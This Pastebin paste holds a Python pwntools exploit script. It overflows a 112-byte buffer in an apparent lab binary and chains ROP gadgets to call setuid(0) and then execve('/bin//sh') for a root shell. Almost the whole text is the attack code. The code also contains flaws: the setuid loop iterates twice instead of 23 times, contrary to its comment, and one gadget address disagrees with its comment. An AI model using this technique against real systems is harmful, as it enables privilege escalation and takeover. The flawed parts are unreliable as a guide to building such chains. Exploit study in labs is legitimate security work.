Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- from pwn import *
- #from subprocess import call
- def main():
- # 1094205761 found at offset: 112
- offset = 112
- # 0x08049453 : xor eax, eax ; ret
- xor_eax = p32(0x08049453)
- # 0x0807a65f : inc eax ; ret
- inc_eax = p32(0x0807a65f)
- # 0x080d5e5d : inc ebx ; ret
- inc_ebx = p32(0x080d5e5d)
- # 0x080d5b4f : inc ecx ; ret
- inc_ecx = p32(0x080d5b4f)
- # 0x0805cd67 : inc edx ; ret
- inc_edx = p32(0x0805cd67)
- # 0x0806f27c : nop ; nop ; nop ; int 0x80
- int_80 = p32(0x0806f27c + 4)
- # 0x080546ab : mov dword ptr [edx], eax ; ret
- mov_to_addr_edx_from_eax = p32(0x080546ab)
- # 0x0806ec7a : pop edx ; ret
- pop_edx = p32(0x0806ec7a)
- # 0x080b7fc6 : pop eax ; ret
- pop_eax = p32(0x080b7fc6)
- # 0x080de6b1 : pop ecx ; ret
- pop_ecx = p32(0x080de6b1)
- # 0x080481c9 : pop ebx ; ret
- pop_ebx = p32(0x080481c9)
- # 0x080481b2 : ret
- ret = p32(0x080481c9)
- # 080ea060 l d .data 00000000 .data
- bin_addr = p32(0x080ea060)
- sh_addr = p32(0x080ea060 + 4)
- bin_sh = bin_addr # Refers to the whole '/bin//sh' string
- # execve(const char *pathname, char *const argv[], char *const envp[])
- # eax ebx ecx edx esi
- # 0x0b char __user * char __user *__user * char __user *__user * struct pt_regs *
- # Writes bin to bin_addr
- rop_shell = ""
- rop_shell += pop_edx # Pops the next value(bin_addr) to the edx register
- rop_shell += bin_addr # bin_addr to be stored in the edx register
- rop_shell += pop_eax # Pops the next value, "/bin" to the eax register
- rop_shell += "/bin" # "/bin" to be stored in the eax register
- rop_shell += mov_to_addr_edx_from_eax # Moves the "/bin" string to the address in edx register
- # Writes sh to sh_addr
- rop_shell += pop_edx # Pops the next value(sh_addr) to the edx register
- rop_shell += sh_addr # sh_addr to be stored in the edx register
- rop_shell += pop_eax # Pops the next value, "//sh" to the eax register
- rop_shell += "//sh" # "//sh" to be stored in the eax register
- rop_shell += mov_to_addr_edx_from_eax # Moves the "//sh" string to the addres in edx register
- # Sets eax to 0x0b
- # 0xb = 11
- rop_shell += xor_eax # Zero-ing eax register
- for i in range(1, 12): # Increments eax until its value is 0xb(11) is reached
- rop_shell += inc_eax # Increments eax register by 1
- # Stores the address of "/bin//sh" in ebx
- rop_shell += pop_ebx # Pops the next value(bin_sh) to the ebx register
- rop_shell += bin_sh # bin_sh to be stored in the ebx register
- # Sets ecx to 0
- rop_shell += pop_ecx # Pops the next value(0xffffffff) to the ecx register
- rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
- rop_shell += inc_ecx # 0xffffffff + 0x1 = 0x00000000
- # Sets edx to 0
- rop_shell += pop_edx # Pops the next value(0xffffffff) to the edx register
- rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
- rop_shell += inc_edx # 0xffffffff + 0x1 = 0x00000000
- # Do a syscall execve("/bin/sh", 0, 0)
- # Eax : 0xb , Ebx: "/bin/sh", Ecx: 0, Edx: 0
- rop_shell += int_80
- # eax ebx
- # 0x17 old_uid_t uid
- # Sets eax to 0x17(23)
- rop_setuid = ""
- rop_setuid += xor_eax # Zero-ing the eax register
- for i in (1, 24): # Increments eax register from 0 till its value is 0x17(23) is reached
- rop_setuid += inc_eax # Increments eax register by 1
- # Sets ebx to 0
- rop_setuid += pop_ebx # Pops the next value(0xffffffff) to the ebx register
- rop_setuid += p32(0xffffffff) # We can't directly store null value since strcpy will fail
- rop_setuid += inc_ebx # 0xffffffff + 0x1 = 0x00000000
- # Do a syscall setuid(0)
- # Eax: 0x17 , Ebx: 0
- rop_setuid += int_80
- # Joins the initial payload with ROP's
- payload = "A" * offset # Padding buffer with junk till offset
- payload += rop_setuid
- payload += rop_shell
- print payload # Display payload in console
- # Writes payload to file for debugging purposes
- fname = 'test'
- with open(fname, 'w') as f:
- f.write(payload)
- # Executes exploit via call : unstable
- # Workaround: ./vuln $(cat test)
- # call(["./vuln", payload])
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement